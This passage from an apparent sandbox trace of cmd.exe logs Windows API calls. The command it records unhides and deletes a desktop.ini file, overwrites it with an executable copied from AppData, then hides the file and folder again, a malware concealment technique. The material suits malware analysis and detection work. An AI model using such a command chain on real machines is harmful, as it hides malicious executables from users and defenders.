\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"" [0128.750] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"" [0128.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.751] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0128.751] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.751] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.751] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.751] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.751] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.751] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.751] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.751] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.751] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.751] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.751] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.751] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.751] GetEnvironmentStringsW () returned 0x3526e0* [0128.751] FreeEnvironmentStringsW (penv=0x3526e0) returned 1 [0128.751] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.751] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.751] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.751] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.751] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.752] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.752] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 
[0128.752] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.752] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.752] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.752] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af830 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.752] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af830, lpFilePart=0x2af82c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af82c*="Desktop") returned 0x18 [0128.752] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.752] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af5ac | out: lpFindFileData=0x2af5ac) returned 0x350d70 [0128.752] FindClose (in: hFindFile=0x350d70 | out: hFindFile=0x350d70) returned 1 [0128.752] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af5ac | out: lpFindFileData=0x2af5ac) returned 0x350d70 [0128.752] FindClose (in: hFindFile=0x350d70 | out: hFindFile=0x350d70) returned 1 [0128.752] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af5ac | out: lpFindFileData=0x2af5ac) returned 0x350d70 [0128.752] FindClose (in: hFindFile=0x350d70 | out: hFindFile=0x350d70) returned 1 [0128.752] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.752] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0128.752] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0128.752] GetEnvironmentStringsW () returned 0x350590* [0128.753] FreeEnvironmentStringsW (penv=0x350590) returned 1 [0128.753] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0128.753] GetConsoleOutputCP () returned 0x1b5 [0128.753] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.753] GetUserDefaultLCID () returned 0x409 [0128.753] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af970, cchData=128 | out: lpLCData="0") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af970, cchData=128 | out: lpLCData="0") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af970, cchData=128 | out: lpLCData="1") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0128.754] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0128.754] setlocale (category=0, locale=".OCP") returned="English_United States.437" 
[0128.755] GetConsoleTitleW (in: lpConsoleTitle=0x340b68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.755] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.755] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0128.755] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0128.755] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0128.756] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0128.756] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0128.756] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0128.756] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0128.756] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0128.756] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0128.756] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0128.758] _wcsicmp (_String1="del", _String2=")") returned 59 [0128.758] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0128.758] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0128.758] _wcsicmp (_String1="IF", _String2="del") returned 5 [0128.758] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0128.758] _wcsicmp (_String1="REM", _String2="del") returned 14 [0128.758] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0128.760] _wcsicmp (_String1="type", _String2=")") returned 75 [0128.760] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0128.760] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0128.760] _wcsicmp (_String1="IF", _String2="type") returned -11 [0128.760] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0128.760] _wcsicmp (_String1="REM", _String2="type") returned -2 [0128.760] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0128.764] SetErrorMode (uMode=0x0) returned 0x0 [0128.764] SetErrorMode (uMode=0x1) 
returned 0x0 [0128.764] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x350650, lpFilePart=0x2af124 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af124*="Desktop") returned 0x18 [0128.764] SetErrorMode (uMode=0x0) returned 0x1 [0128.764] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.764] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.768] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.769] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0xffffffff [0128.769] GetLastError () returned 0x2 [0128.769] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0xffffffff [0128.769] GetLastError () returned 0x2 [0128.769] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0x350938 [0128.769] FindClose (in: hFindFile=0x350938 | out: hFindFile=0x350938) returned 1 [0128.770] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0xffffffff [0128.770] GetLastError () returned 0x2 [0128.770] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, 
lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0x350938 [0128.770] FindClose (in: hFindFile=0x350938 | out: hFindFile=0x350938) returned 1 [0128.770] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.770] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.770] GetConsoleTitleW (in: lpConsoleTitle=0x2af398, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.812] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af220, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af2e8 | out: lpAttributeList=0x2af220, lpSize=0x2af2e8) returned 1 [0128.812] UpdateProcThreadAttribute (in: lpAttributeList=0x2af220, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af2e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af220, lpPreviousValue=0x0) returned 1 [0128.812] GetStartupInfoW (in: lpStartupInfo=0x2af1dc | out: lpStartupInfo=0x2af1dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0128.812] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.813] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af27c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af2c8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", lpProcessInformation=0x2af2c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x6bc, dwThreadId=0x514)) returned 1 [0128.815] CloseHandle (hObject=0x4c) returned 1 [0128.815] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.815] GetEnvironmentStringsW () returned 0x350bc8* [0128.816] FreeEnvironmentStringsW (penv=0x350bc8) returned 1 [0128.816] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0128.913] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af1bc | out: lpExitCode=0x2af1bc*=0x0) returned 1 [0128.913] CloseHandle (hObject=0x50) returned 1 [0128.913] _vsnwprintf (in: _Buffer=0x2af304, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af1c8 | out: _Buffer="00000000") returned 8 [0128.913] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0128.913] GetEnvironmentStringsW () returned 0x3526d0* [0128.913] FreeEnvironmentStringsW (penv=0x3526d0) returned 1 [0128.913] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.913] GetEnvironmentStringsW () returned 0x3526d0* [0128.913] FreeEnvironmentStringsW (penv=0x3526d0) returned 1 [0128.913] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af220 | out: lpAttributeList=0x2af220) [0128.913] GetConsoleTitleW (in: lpConsoleTitle=0x2af5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.914] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae618, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ae61c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, 
lpMaximumComponentLength=0x2ae618*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0128.914] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0128.914] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0128.914] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0128.914] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\desktop.ini")) returned 0xffffffff [0128.914] GetLastError () returned 0x2 [0128.914] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x10 [0128.914] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0128.915] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0128.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\desktop.ini")) returned 0xffffffff [0128.915] GetLastError () returned 0x2 [0128.915] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x35384c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x35384c) returned 0xffffffff [0128.915] GetLastError () returned 0x2 [0128.915] _get_osfhandle (_FileHandle=2) returned 0xb [0128.915] GetFileType (hFile=0xb) returned 0x2 [0128.915] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0128.915] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2af018 | out: lpMode=0x2af018) returned 1 [0128.915] _get_osfhandle (_FileHandle=2) returned 0xb [0128.915] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2af04c | out: lpConsoleScreenBufferInfo=0x2af04c) returned 1 [0128.915] FormatMessageW (in: dwFlags=0x1a00, 
lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0128.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.916] GetFileType (hFile=0x7) returned 0x2 [0128.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af73c | out: lpMode=0x2af73c) returned 1 [0128.916] _dup (_FileHandle=1) returned 3 [0128.917] _close (_FileHandle=1) returned 0 [0128.917] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini", _String2="con") returned -53 [0128.917] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af70c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0128.917] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0128.917] GetConsoleTitleW (in: lpConsoleTitle=0x2af53c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.917] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2af0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af0a0) returned 0x34e760 [0128.917] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0128.917] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0128.917] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0128.918] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2adfac, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0128.918] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0128.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.918] GetFileType (hFile=0x58) returned 0x1 [0128.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.918] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2ae004 | out: lpFileSizeHigh=0x2ae004*=0x0) returned 0x7d600 [0128.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.918] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.918] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.918] GetFileType (hFile=0x50) returned 0x1 [0128.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.918] GetFileType (hFile=0x50) returned 0x1 [0128.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.918] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] GetFileType (hFile=0x50) returned 0x1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, 
lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] GetFileType (hFile=0x50) returned 0x1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] GetFileType (hFile=0x50) returned 0x1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, 
lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.920] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.920] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, 
